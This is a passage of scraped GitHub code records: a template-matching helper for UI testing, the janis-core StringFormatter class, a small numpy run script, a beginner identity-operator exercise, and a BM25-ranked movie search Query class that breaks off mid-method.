all_pages.intersection(pages[eid])\n\n if len(all_pages) == 1:\n current_page = all_pages.pop()\n return current_page\n else:\n print(\"There are more than 1 page with the same elements\")\n\n\ndef load_functions(file_name):\n functions = dict()\n\n # added lower\n with open(file_name, \"r\") as input_file:\n for line in input_file:\n string_list = [s for s in re.split(' |, |,|\\(|\\)', line) if s != '' and s != '\\n']\n functions[string_list[0], string_list[1]] = string_list[2:]\n\n print(functions)\n return functions\n\n\ndef load_elements(path, type):\n elements = {}\n images_path = os.path.join(path, '*' + type)\n # added .lower()\n for file in glob.glob(images_path): # ex: 'Assets/elements/*png'\n id = file[file.rfind('\\\\') + 1: file.find('.' + type)] # for windows change find \\ and for linux find /\n elements[id] = cv2.imread(file)\n\n return elements\n\n\ndef get_elements_color_diff(elements, elements_coord, screenshot):\n elements_color_diff = dict()\n\n for eid in elements.keys():\n if elements_coord[eid] != None:\n coord_image = screenshot[elements_coord[eid][0][1]:elements_coord[eid][1][1],\n elements_coord[eid][0][0]:elements_coord[eid][1][0]]\n avg1 = cv2.mean(elements[eid])[0:3]\n avg2 = cv2.mean(coord_image)[0:3]\n elements_color_diff[eid] = color_diff(avg1, avg2)\n\n return elements_color_diff\n\n\ndef get_elements_coordinates(elements, screenshot, threshold):\n screenshot_gray = cv2.cvtColor(screenshot, cv2.COLOR_BGR2GRAY)\n\n elements_coord = dict()\n\n for eid in elements.keys():\n template = cv2.cvtColor(elements[eid], cv2.COLOR_BGR2GRAY)\n (startX, startY, endX, endY) = find_element(screenshot_gray, template, threshold)\n elements_coord[eid] = [(startX, startY), (endX, endY)]\n\n return elements_coord\n\n\ndef find_element(image, element, threshold=0.9, edge_detection=False, multi_scale=False, visualize=False):\n if multi_scale:\n scales = np.linspace(0.2, 1.0, 20)[::-1]\n else:\n scales = [1]\n\n print('========================== find_elem =====================')\n print(element)\n print('========================== end find_elem =================')\n (tH, tW) = element.shape[:2]\n found = None\n\n for scale in scales:\n\n image_resized = imutils.resize(image, width=int(image.shape[1] * scale))\n r = image.shape[1] / float(image_resized.shape[1])\n\n if image_resized.shape[0] < tH or image_resized.shape[1] < tW:\n break\n\n if edge_detection:\n image_resized = cv2.Canny(image_resized, 50, 200)\n element = cv2.Canny(element, 50, 200)\n\n result = cv2.matchTemplate(image_resized, element, cv2.TM_CCOEFF_NORMED)\n (_, maxVal, _, maxLoc) = cv2.minMaxLoc(result)\n\n if visualize:\n clone = np.dstack([result, result, result])\n cv2.rectangle(clone, (maxLoc[0], maxLoc[1]),\n (maxLoc[0] + tW, maxLoc[1] + tH), (0, 0, 255), 2)\n cv2.imshow(\"Visualize\", clone)\n cv2.waitKey(0)\n\n if found is None or maxVal > found[0]:\n found = (maxVal, maxLoc, r)\n\n (maxVal, maxLoc, r) = found\n if maxVal > threshold:\n (startX, startY) = (int(maxLoc[0] * r), int(maxLoc[1] * r))\n (endX, endY) = (int((maxLoc[0] + tW) * r), int((maxLoc[1] + tH) * r))\n else:\n (startX, startY, endX, endY) = (0, 0, 0, 0)\n\n return (startX, startY, endX, endY)\n\n\ndef do_overlap(startX1_startY1, endX1_endY1, startX2_startY2, endX2_endY2):\n startX1, startY1 = startX1_startY1\n endX1, endY1 = endX1_endY1\n startX2, startY2 = startX2_startY2\n endX2, endY2 = endX2_endY2\n\n if startX1 > endX2 or startX2 > endX1 or startY1 > endY2 or startY2 > endY1:\n return False\n\n return True\n\n\ndef color_diff(r1_g1_b1, r2_g2_b2):\n r1, g1, b1 = r1_g1_b1\n r2, g2, b2 = r2_g2_b2\n return np.sqrt((r2 - r1) ** 2 + (g2 - g1) ** 2 + (b2 - b1) ** 2)\n","repo_name":"Katzuno/BACKEND-Automation-Testing-with-Computer-Vision","sub_path":"elements_bkp.py","file_name":"elements_bkp.py","file_ext":"py","file_size_in_byte":12422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"86553305842","text":"from typing import Optional, List, Dict, Tuple\n\nfrom janis_core.types import String, AnyType\nfrom janis_core.utils import first_value\nfrom janis_core.operators.logical import Operator, AddOperator\nfrom janis_core.utils.bracketmatching import get_keywords_between_braces\nfrom janis_core.utils.errors import (\n TooManyArgsException,\n IncorrectArgsException,\n InvalidByProductException,\n ConflictingArgumentsException,\n)\nfrom janis_core.utils.logger import Logger\nfrom janis_core import settings\n\nclass StringFormatter(Operator):\n \"\"\"\n A StringFormatter is used to allow inputs or other values to be inserted at runtime into a string template. A StringFormatter can be concatenated with Python strings, another StringFormatter or an InputSelector.\n\n The string \"{placeholdername}\" can be used within a string format, where placeholdername is a kwarg passed to the StringFormatter with the intended selector or value.\n\n The placeholder names must be valid Python variable names (as they’re passed as kwargs). See the String formatter tests for more examples.\n\n eg:\n ToolInput('greeting', String, default='Hello')\n ToolInput('username', String, default='Grace')\n \n StringFormatter(\"Hello, {name}\", name=InputSelector(\"username\"))\n >\"Hello, Grace\"\n\n \"Hello, \" + InputSelector(\"username\")\n >\"Hello, Grace\"\n\n InputSelector(\"greeting\") + StringFormatter(\", {name}\", name=InputSelector(\"username\"))\n >\"Hello, Grace\"\n\n \"\"\"\n def returntype(self):\n return String()\n\n def argtypes(self):\n return [String, Optional[AnyType]]\n\n @staticmethod\n def friendly_signature():\n return \"String, **kwargs -> String\"\n\n def validate(self, perform_typecheck=False):\n return True\n\n def __init__(self, format: str, **kwargs):\n super().__init__([])\n # ignore super().__init__ call\n self._format: str = format\n\n keywords, balance = get_keywords_between_braces(self._format)\n\n if balance > 0:\n Logger.warn(\n \"There was an imbalance of braces in the string _format, this might cause issues with concatenation\"\n )\n\n skwargs = set(kwargs.keys())\n\n if settings.validation.VALIDATE_STRINGFORMATTERS:\n if not keywords == skwargs:\n # what's the differences\n if not keywords.issubset(skwargs):\n raise IncorrectArgsException(\n \"The _format required additional arguments to be provided by \"\n \"**kwargs, requires the keys:\" + \", \".join(keywords - skwargs)\n )\n else:\n raise TooManyArgsException(\n \"The **kwargs contained unrecognised keys: \"\n + \", \".join(skwargs - keywords)\n )\n\n self.kwargs = kwargs\n\n resolved_types = [str, int, float]\n\n def to_cwl(self, unwrap_operator, *args):\n raise Exception(\"Don't use this method\")\n\n def to_wdl(self, unwrap_operator, *args):\n raise Exception(\"Don't use this method\")\n\n def to_nextflow(self, unwrap_operator, *args):\n raise Exception(\"Don't use this method\")\n\n def to_python(self, unwrap_operator, *args):\n f = self._format\n for k, v in self.kwargs.items():\n f = f.replace(f\"{{{str(k)}}}\", unwrap_operator(v))\n return f\n\n def evaluate(self, inputs):\n resolvedvalues = {\n k: self.evaluate_arg(v, inputs) for k, v in self.kwargs.items()\n }\n\n values_that_are_lists = {\n k: v for k, v in resolvedvalues.items() if isinstance(v, list)\n }\n\n inp_combinations: List[dict] = [{}]\n\n if len(values_that_are_lists) > 0:\n l = len(first_value(values_that_are_lists))\n list_values_that_are_different = sum(\n 0 if len(v) == l else 1 for v in values_that_are_lists.values()\n )\n\n if list_values_that_are_different == 0:\n # dot product\n inp_combinations = [\n {k: v[i] for k, v in values_that_are_lists.items()}\n for i in range(l)\n ]\n elif list_values_that_are_different == 1:\n # cross product\n inp_combinations = self.generate_combinations_of_input_dicts(\n values_that_are_lists=list(values_that_are_lists.items())\n )\n else:\n l_lengths = \", \".join(\n f\"{k}={len(v)}\" for k, v in values_that_are_lists.items()\n )\n raise Exception(\n \"String Formatter evaluation doesn't support scattering for list of \"\n )\n\n evaluated_combinations = [\n self.resolve_with_resolved_values(**{**resolvedvalues, **c})\n for c in inp_combinations\n ]\n if len(evaluated_combinations) == 0:\n raise Exception(\n \"Something happened when resolving inputs with input values \"\n + str(inputs)\n )\n elif len(evaluated_combinations) == 1:\n return evaluated_combinations[0]\n else:\n return evaluated_combinations\n\n def rewrite_operator(self, args_to_rewrite: dict):\n return self.__class__(\n self._format, **self.substitute_arg(args_to_rewrite, self.kwargs)\n )\n\n @staticmethod\n def generate_combinations_of_input_dicts(\n values_that_are_lists: List[Tuple[str, List[any]]]\n ) -> List[Dict]:\n\n if len(values_that_are_lists) == 0:\n return []\n key = values_that_are_lists[0][0]\n values = values_that_are_lists[0][1]\n\n if len(values_that_are_lists) == 1:\n return [{key: v} for v in values]\n\n combinations = []\n for v in values:\n for c in StringFormatter.generate_combinations_of_input_dicts(\n values_that_are_lists[1:]\n ):\n combinations.append({**c, key: v})\n\n return combinations\n\n def __repr__(self):\n val = self._format\n for k, v in self.kwargs.items():\n val = val.replace(f\"{{{k}}}\", f\"{{{str(v)}}}\")\n return val\n\n def get_leaves(self):\n leaves = []\n for a in self.kwargs.values():\n if isinstance(a, Operator):\n leaves.extend(a.get_leaves())\n else:\n leaves.append(a)\n return leaves\n\n def resolve_with_resolved_values(self, **resolved_values):\n\n s1 = set(self.kwargs.keys())\n actual_keys, _ = get_keywords_between_braces(self._format)\n if s1 != actual_keys:\n diff = (actual_keys - s1).union(s1 - actual_keys)\n\n raise Exception(\n \"The format for the string builder has changed since runtime, or an internal error has\"\n \" occurred. The following keys did not appear in both sets: \"\n + \", \".join(diff)\n )\n\n s2 = set(resolved_values.keys())\n\n missing_keys = s1 - s2\n if len(missing_keys) > 0:\n raise IncorrectArgsException(\n \"There were missing parameters when formatting string: \"\n + \", \".join(missing_keys)\n )\n\n unresolved_values = [\n f\"{r} ({type(resolved_values[r]).__name__})\"\n for r in resolved_values\n if not any(\n isinstance(resolved_values[r], t)\n for t in StringFormatter.resolved_types\n )\n ]\n if len(unresolved_values) > 0:\n raise ValueError(\n \"There were unresolved parameters when formatting string: \"\n + \", \".join(unresolved_values)\n )\n\n retval = self._format\n for k in resolved_values:\n retval = retval.replace(f\"{{{k}}}\", str(resolved_values[k]))\n return retval\n\n def __radd__(self, other):\n return StringFormatter(other) + self\n\n def __add__(self, other):\n from janis_core.operators.selectors import InputSelector\n\n if isinstance(other, str):\n # check if it has args in it\n keywords = get_keywords_between_braces(other)\n if len(keywords) > 0:\n invalidkwargs = [k for k in self.kwargs if k not in self.kwargs]\n if len(invalidkwargs) > 0:\n raise InvalidByProductException(\n f\"The string to be concatenated contained placeholder(s) ({', '.join(invalidkwargs)})\"\n f\"that were not in the original StringFormatter\"\n )\n return self._create_new_formatter_from_strings_and_args(\n [self._format, other], **self.kwargs\n )\n\n elif isinstance(other, InputSelector):\n return self + other.to_string_formatter()\n\n elif isinstance(other, StringFormatter):\n # check if args overlap and they're different\n s1 = set(self.kwargs.keys())\n s2 = set(other.kwargs.keys())\n intersection = s1.intersection(s2)\n\n if len(intersection) > 0:\n not_same_args = [\n k for k in intersection if self.kwargs[k] != other.kwargs[k]\n ]\n if len(not_same_args) > 0:\n raise ConflictingArgumentsException(\n f\"Couldn't concatenate formats as there keys ({', '.join(not_same_args)}) \"\n f\"that were not equal between formatters \"\n )\n\n # yeah we sweet\n new_args = {**self.kwargs, **other.kwargs}\n return StringFormatter._create_new_formatter_from_strings_and_args(\n [self._format, other._format], **new_args\n )\n\n @staticmethod\n def _create_new_formatter_from_strings_and_args(strings: [str], **kwargs):\n new_format = \"\".join(strings)\n try:\n return StringFormatter(new_format, **kwargs)\n except IncorrectArgsException as e:\n new_params = set(\n get_keywords_between_braces(new_format)[0] - set(kwargs.keys())\n )\n raise InvalidByProductException(\n \"Joining the input files (to '{new_format}') created the new params: \"\n + \", \".join(new_params)\n )\n\n def to_string_formatter(self):\n return self\n","repo_name":"PMCC-BioinformaticsCore/janis-core","sub_path":"janis_core/operators/stringformatter.py","file_name":"stringformatter.py","file_ext":"py","file_size_in_byte":10504,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"73592218352","text":"# Custom files\nimport outputs\n\nimport tout\n\n\n\nimport sys\nimport os\nimport numpy as np\n\n\npath = sys.argv[1]\nos.chdir(path)\nprint('Accessing directory: ', os.getcwd())\n\ndef reconstruct_timestep():\n final_timestep = []\n final_timestep.append(np.load('gal.npy'))\n final_timestep.append(np.load('gas.npy'))\n final_timestep.append(np.load('new.npy'))\n final_timestep.append(np.load('old.npy'))\n return final_timestep\n\ndef main():\n # Imports everything and makes spatial plot if nececcary\n # Final time step should be a 3D array containing gal, gas, new & old\n if outputs.run_tout == True:\n\n file_exists = os.path.exists('timestep.npy')\n print('file exists? ',file_exists)\n\n if outputs.run_from_file == False or file_exists == False: \n tout.run_tout()\n \n else: # Used for debugging & testing\n print('running from file')\n reconstruct_timestep()\n \n\n \n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"madeleine-mckenzie/mPhys","sub_path":"project_2/Analysis_scripts/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"799283232","text":"# a = 20\n# b = 20\n\n# if ( a is b ):\n# print (\"Line 1 - a and b have same identity\")\n# else:\n# print (\"Line 1 - a and b do not have same identity\")\n\n# if ( id(a) == id(b) ):\n# print (\"Line 2 - a and b have same identity\")\n# else:\n# print (\"Line 2 - a and b do not have same identity\")\n\n# b = 30\n# if ( a is b ):\n# print (\"Line 3 - a and b have same identity\")\n# else:\n# print (\"Line 3 - a and b do not have same identity\")\n\n# if ( a is not b ):\n# print (\"Line 4 - a and b do not have same identity\")\n# else:\n# print (\"Line 4 - a and b have same identity\")\n\n\n# x = 20\n# y = 30\n\n# print(x is y)\n\n# y = x\n# print(x is y)\n\nimport random\nb = ''\nrandom_four = random.randrange(1,100)\nfor n in range(4):\n\n n = random.randint(1,9)\n n = str(n)\n b += n \n print(n)\nprint(b)","repo_name":"Anosike-CK/class_code","sub_path":"Identity_Operators.py","file_name":"Identity_Operators.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18496403175","text":"\"\"\"\n------------------------------------------------------------\nAuthor: Leo LI\nDate: 10th Feb 2023\nDescription: Responsible for retrieve results for different\ntypes of queries\n------------------------------------------------------------\n\"\"\"\nimport math\nimport Util\n\n\nclass Query:\n \"\"\"\n Class handling the query request and providing APIs\n \"\"\"\n def __init__(self, dataset):\n self.__dataset = dataset.get_data()\n self.__index_general = dataset.get_index()\n self.__index_title = dataset.get_index_title()\n self.__index_keyword = dataset.get_index_keywords()\n self.__index_genre = dataset.get_index_genre()\n self.__index_language = dataset.get_index_language()\n self.__average_number_of_terms = self.__cal_average_number_of_terms()\n self.__number_of_docs = len(self.__dataset.keys())\n self.__stop_words = dataset.get_stop_words()\n self.__number_of_terms_dict = {}\n for docid in self.__dataset:\n self.__number_of_terms_dict[docid] = self.__number_of_terms(docid)\n\n # providing util method for proper prickling\n def __getstate__(self):\n return {\n \"dataset\": self.__dataset,\n \"index_general\": self.__index_general,\n \"index_title\": self.__index_title,\n \"index_keyword\": self.__index_keyword,\n \"index_genre\": self.__index_genre,\n \"index_language\": self.__index_language,\n \"average_number_of_terms\": self.__average_number_of_terms,\n \"number_of_docs\": self.__number_of_docs,\n \"stop_words\": self.__stop_words,\n \"number_of_terms\": self.__number_of_terms_dict\n }\n\n def __setstate__(self, state):\n self.__dataset = state[\"dataset\"]\n self.__index_general = state[\"index_general\"]\n self.__index_title = state[\"index_title\"]\n self.__index_keyword = state[\"index_keyword\"]\n self.__index_genre = state[\"index_genre\"]\n self.__average_number_of_terms = state[\"average_number_of_terms\"]\n self.__number_of_docs = state[\"number_of_docs\"]\n self.__stop_words = state[\"stop_words\"]\n self.__index_language = state[\"index_language\"]\n self.__number_of_terms_dict = state[\"number_of_terms\"]\n\n def by_title(self, keywords, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Search by title\n\n Args:\n keywords: String -> query contents\n year1: Integer -> year filter - published later than...\n year2: Integer -> year filter - published earlier than...\n not_ranking: Bool -> switch for applying BM25 ranking\n\n Raises:\n Exception: If keywords is empty\n\n Returns:\n List -> A list of relevant docids\n \"\"\"\n result = []\n if keywords:\n keywords = keywords.split()\n # if search for a single word\n if len(keywords) == 1:\n result = self.__plain_search(keywords[0].lower(), \"title\")\n else:\n for keyword in keywords:\n result += self.__plain_search(keyword.lower(), \"title\")\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking(keywords, result)\n\n def by_keywords(self, keywords, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Search by keywords\n\n Args:\n keywords: String -> query contents\n year1: Integer -> year filter - published later than...\n year2: Integer -> year filter - published earlier than...\n not_ranking: Bool -> switch for applying BM25 ranking\n\n Returns:\n List -> A list of relevant docids\n\n Raises:\n Exception: If keywords is empty\n \"\"\"\n result = []\n if keywords:\n keywords = keywords.split()\n # if search for a single word\n if len(keywords) == 1:\n result = self.__plain_search(keywords[0].lower(), \"keywords\")\n else:\n for keyword in keywords:\n result += self.__plain_search(keyword.lower(), \"keywords\")\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking(keywords, result)\n\n def by_genres(self, keywords, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Search by genre\n\n Args:\n keywords: String -> query contents\n year1: Integer -> year filter - published later than...\n year2: Integer -> year filter - published earlier than...\n not_ranking: Bool -> switch for applying BM25 ranking\n\n Returns:\n List -> A list of relevant docids\n\n Raises:\n Exception: If keywords is empty\n \"\"\"\n result = []\n if keywords:\n keywords = keywords.split()\n # if search for a single word\n if len(keywords) == 1:\n result = self.__plain_search(keywords[0].lower(), \"genre\")\n else:\n for keyword in keywords:\n result += self.__plain_search(keyword.lower(), \"genre\")\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking(keywords, result)\n\n def by_language(self, keywords, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Search by language\n\n Args:\n keywords: String - query contents\n year1: Integer -> year filter - published later than...\n year2: Integer -> year filter - published earlier than...\n not_ranking: Bool -> switch for applying BM25 ranking\n\n Returns:\n List -> A list of relevant docids\n\n Raises:\n Exception: If keywords is empty\n \"\"\"\n result = []\n if keywords:\n keywords = keywords.split()\n # if search for a single word\n if len(keywords) == 1:\n result = self.__plain_search(keywords[0].lower(), \"language\")\n else:\n for keyword in keywords:\n result += self.__plain_search(keyword.lower(), \"language\")\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking(keywords, result)\n\n def by_general(self, keywords, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Perform general queries\n\n Args:\n keywords: String - query contents\n year1: Integer -> year filter - published later than...\n year2: Integer -> year filter - published earlier than...\n not_ranking: Bool -> switch for applying BM25 ranking\n\n Returns:\n List -> A list of relevant docids\n\n Raises:\n Exception: If keywords is empty\n \"\"\"\n result = []\n if keywords:\n keywords = keywords.split()\n # if search for a single word\n if len(keywords) == 1:\n result = self.__plain_search(keywords[0].lower())\n else:\n for keyword in keywords:\n result += self.__plain_search(keyword.lower())\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking(keywords, result)\n\n def __filter_year(self, year, position, docids):\n \"\"\"\n Method to filter the result by year\n\n Args:\n year: Integer -> representing the date\n position: Integer -> Direction of the filter, 1 represent find result later than \"year\", otherwise earlier\n docids: List -> A list of docids\n\n Returns:\n List -> A list of docids filtered\n \"\"\"\n result = []\n if position == 1:\n for docid in docids:\n if self.__dataset[docid][\"year\"]:\n if int(self.__dataset[docid][\"year\"]) > year:\n result.append(docid)\n else:\n for docid in docids:\n if self.__dataset[docid][\"year\"]:\n if int(self.__dataset[docid][\"year\"]) < year:\n result.append(docid)\n return result\n\n def __plain_search(self, word_to_be_queried, attributes=None):\n \"\"\"\n Method to perform plain single word search\n\n Args:\n word_to_be_queried: String -> the word to be queried\n attributes: String -> which area to be queried (e.g. \"title\"), perform a general query if it's None\n\n Returns:\n List -> A list of relevant docids\n \"\"\"\n result = []\n # Detect if the search is specified to an attribute\n if attributes:\n if attributes == \"title\":\n if word_to_be_queried in self.__index_title:\n for docid, position in self.__index_title[word_to_be_queried][1].items():\n result.append(docid)\n if attributes == \"keywords\":\n if word_to_be_queried in self.__index_keyword:\n for docid, position in self.__index_keyword[word_to_be_queried][1].items():\n result.append(docid)\n if attributes == \"genre\":\n if word_to_be_queried in self.__index_genre:\n for docid, position in self.__index_genre[word_to_be_queried][1].items():\n result.append(docid)\n if attributes == \"language\":\n if word_to_be_queried in self.__index_language:\n for docid, position in self.__index_language[word_to_be_queried][1].items():\n result.append(docid)\n # Use general research if no attribute input \n else:\n if word_to_be_queried in self.__index_general:\n for docid, position in self.__index_general[word_to_be_queried][1].items():\n result.append(docid)\n stemmed = Util.stem_data(word_to_be_queried)\n punctuationRemoved1 = Util.remove_punctuation(word_to_be_queried, True)\n punctuationRemoved2 = Util.remove_punctuation(word_to_be_queried)\n if stemmed in self.__index_general:\n for docid, position in self.__index_general[stemmed][1].items():\n result.append(docid)\n if punctuationRemoved1 in self.__index_general:\n for docid, position in self.__index_general[punctuationRemoved1][1].items():\n result.append(docid)\n if punctuationRemoved2 in self.__index_general:\n for docid, position in self.__index_general[punctuationRemoved2][1].items():\n result.append(docid)\n return list(dict.fromkeys(result))\n\n def __position_search(self, word_to_be_queried, attribute=None):\n \"\"\"\n Method to direct perform single word search with docid\n\n Args:\n word_to_be_queried: String -> the word to be queried\n attribute: String -> which area to be queried (e.g. \"title\"), perform a general query if it's None\n\n Returns:\n List -> A list of relevant docids\n \"\"\"\n result = {}\n stemmed = Util.stem_data(word_to_be_queried)\n punctuationRemoved1 = Util.remove_punctuation(word_to_be_queried, True)\n punctuationRemoved2 = Util.remove_punctuation(word_to_be_queried)\n if attribute is None:\n search_field = self.__index_general\n elif attribute == \"title\":\n search_field = self.__index_title\n elif attribute == \"keywords\":\n search_field = self.__index_keyword\n elif attribute == \"genre\":\n search_field = self.__index_genre\n elif attribute == \"language\":\n search_field = self.__index_language\n if word_to_be_queried in search_field:\n for docid, position in search_field[word_to_be_queried][1].items():\n position_list = [x for x in position if x.isnumeric()]\n if position_list:\n if docid not in result:\n result[docid] = position_list\n else:\n result[docid] += position_list\n if stemmed in search_field:\n for docid, position in search_field[stemmed][1].items():\n position_list = [x for x in position if x.isnumeric()]\n if position_list:\n if docid not in result:\n result[docid] = position_list\n else:\n result[docid] += position_list\n if punctuationRemoved1 in search_field:\n for docid, position in search_field[punctuationRemoved1][1].items():\n position_list = [x for x in position if x.isnumeric()]\n if position_list:\n if docid not in result:\n result[docid] = position_list\n else:\n result[docid] += position_list\n if punctuationRemoved2 in search_field:\n for docid, position in search_field[punctuationRemoved2][1].items():\n position_list = [x for x in position if x.isnumeric()]\n if position_list:\n if docid not in result:\n result[docid] = position_list\n else:\n result[docid] += position_list\n # remove duplicate\n for key in result:\n new_list = []\n for item in result[key]:\n if item not in new_list:\n new_list.append(item)\n result[key] = new_list\n return result\n\n def phrase_search_handler(self, keywords, year1=None, year2=None, not_ranking=False, attribute=None, is_list=False):\n \"\"\"\n Entry for perform a new query, handling the phrase search\n\n Args:\n keywords: String -> query contents\n year1: Integer -> Year filter - published later than...\n year2: Integer -> Year filter - published earlier than...\n not_ranking: Bool -> Switch for applying BM25 ranking\n attribute: String -> which area to be queried (e.g. \"title\"), perform a general query if it's None\n is_list: Bool -> if the keywords is passed in as a list of words, used for recursive call\n\n Returns:\n List -> A list of relevant docids\n\n Raises:\n Exception: If keywords is empty\n \"\"\"\n result = []\n if keywords:\n # remove \" in the beginning and the ending\n if not is_list:\n if not Util.is_phrase_search(keywords):\n if attribute is None:\n return self.by_general(keywords, year1, year2, not_ranking)\n elif attribute == \"title\":\n return self.by_title(keywords, year1, year2, not_ranking)\n elif attribute == \"keywords\":\n return self.by_keywords(keywords, year1, year2, not_ranking)\n elif attribute == \"genre\":\n return self.by_genres(keywords, year1, year2, not_ranking)\n elif attribute == \"language\":\n return self.by_language(keywords, year1, year2, not_ranking)\n keywords = keywords.split()\n keywords[0] = keywords[0][1:]\n keywords[len(keywords) - 1] = keywords[len(keywords) - 1][:-1]\n for i in range(1, len(keywords)):\n if i == 1:\n result += self.proximity_search(keywords[i - 1].lower(), keywords[i].lower(), 1, True, attribute,\n False, None, None, True)\n else:\n new_result = self.proximity_search(keywords[i - 1].lower(), keywords[i].lower(), 1, True, attribute,\n False, None, None, True)\n result = list(set(result) & set(new_result))\n if not result:\n break\n print(\"1st res: \", result)\n if not is_list:\n keywords_plot = Util.remove_stop_words(keywords, self.__stop_words)\n result += self.phrase_search_handler(keywords_plot, year1, year2, not_ranking, attribute, True)\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return list(dict.fromkeys(self.bm25_ranking(keywords, result)))\n\n def proximity_search(self, word1, word2, distance, phrase_search=False, attribute=None,\n direct_call=False, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Method to perform proximity search\n\n Args:\n word1: String -> first word to be queried\n word2: String -> second word to be queried\n distance: Integer -> distance between the two words\n phrase_search: Bool -> is this a phrase search\n attribute: String -> which area to be queried (e.g. \"title\"), perform a general query if it's None\n direct_call: Bool -> if the method is directly called by the frontend\n year1: Integer -> Year filter - published later than...\n year2: Integer -> Year filter - published earlier than...\n not_ranking: Bool -> Switch for applying BM25 ranking\n\n Returns:\n List -> A list of relevant docids\n \"\"\"\n result = []\n if word1 and word2 and distance is not None:\n word1_result = self.__position_search(word1, attribute)\n word2_result = self.__position_search(word2, attribute)\n common_result = set(word1_result.keys()) & set(word2_result.keys())\n # print(\"gogogo\", common_result)\n if common_result:\n for docid in common_result:\n # print(\"docid: \", docid)\n position_1 = word1_result[docid]\n # print(word1, \" : \", position_1)\n position_2 = word2_result[docid]\n # print(word2, \" : \", position_2)\n positions = position_1 + position_2\n # print(\"Merge: \", positions)\n if phrase_search:\n for i in range(len(position_1)):\n for j in range(len(position_1), len(positions)):\n # print(\"position at the doc: \", positions[i], int(positions[j]))\n if int(positions[i]) - int(positions[j]) == -1 or \\\n int(positions[i]) - int(positions[j]) == 0:\n result.append(docid)\n else:\n for i in range(len(position_1)):\n for j in range(len(position_1), len(positions)):\n if abs(int(positions[i]) - int(positions[j])) <= distance:\n result.append(docid)\n # print(\"result: \", result)\n if direct_call:\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking([word1, word2], result)\n return result\n\n def __term_frequency(self, word_to_be_queried, docid):\n \"\"\"\n Compute the term frequency for a token in a specific document\n\n Args:\n word_to_be_queried: String -> the token to be proceed\n docid: Integer -> the document id\n\n Returns:\n Integer -> term frequency\n \"\"\"\n appearance_in_cast = 0\n appearance_in_title = 0\n appearance_in_spot = 0\n appearance_in_keywords = 0\n if docid in self.__index_general[word_to_be_queried][1]:\n for position in self.__index_general[word_to_be_queried][1][docid]:\n if position.isnumeric():\n if int(position) < 100:\n appearance_in_title += 1\n elif int(position) > 1000000:\n appearance_in_cast += 1\n elif int(position) > 500:\n appearance_in_spot += 1\n elif position == \"keyword\":\n appearance_in_keywords += 1\n return (len(self.__index_general[word_to_be_queried][1][docid]) - appearance_in_cast * 0.5 +\n appearance_in_title * 3.5 + appearance_in_spot * 1.8 + appearance_in_keywords * 2.3)\n else:\n return 0\n\n def __document_frequency(self, word_to_be_queried):\n \"\"\"\n Compute the document frequency for a token\n\n Args:\n word_to_be_queried: String -> the token to be proceed\n\n Returns:\n Integer -> document freqhency\n \"\"\"\n return len(self.__index_general[word_to_be_queried][1])\n\n def __cal_average_number_of_terms(self):\n \"\"\"\n Calculate the average number of terms included in each document\n\n Args:\n n/a\n\n Returns:\n Integer -> the average number of terms included in each document\n \"\"\"\n number_of_tokens = 0\n for docid, info in self.__dataset.items():\n for attribute, token in info.items():\n if token is not None:\n number_of_tokens += len(token)\n return number_of_tokens / len(self.__dataset)\n\n def __number_of_terms(self, docid):\n \"\"\"\n Compute the number of terms appeared in a specific document\n\n Args:\n docid: Integer -> the document to be proceeded\n\n Returns:\n Integer -> number of terms appeared in a specific document\n \"\"\"\n number_of_tokens = 0\n for attribute, token in self.__dataset[docid].items():\n if token is not None:\n number_of_tokens += len(token)\n return number_of_tokens\n\n def bm25(self, word_to_be_queried, docid):\n \"\"\"\n Calculate the BM25 score for a specific term in a specific document\n\n Args:\n word_to_be_queried: String -> the term to be proceed\n docid: Integer -> the document to be proceeded\n\n Returns:\n Integer -> BM25 score\n \"\"\"\n k = 1.5\n if word_to_be_queried not in self.__index_general:\n return 0\n document_frequency = self.__document_frequency(word_to_be_queried)\n term_frequency = self.__term_frequency(word_to_be_queried, docid)\n L_division = self.__number_of_terms_dict[docid] / self.__average_number_of_terms\n log_value = (self.__number_of_docs - document_frequency + 0.5) / \\\n (document_frequency + 0.5)\n w_td = format((term_frequency / (k * L_division + term_frequency + 0.5))\n * math.log10(log_value), '.4f')\n w_td = float(w_td)\n return w_td\n\n def bm25_ranking(self, keywords, docid_list, returnScore=False):\n 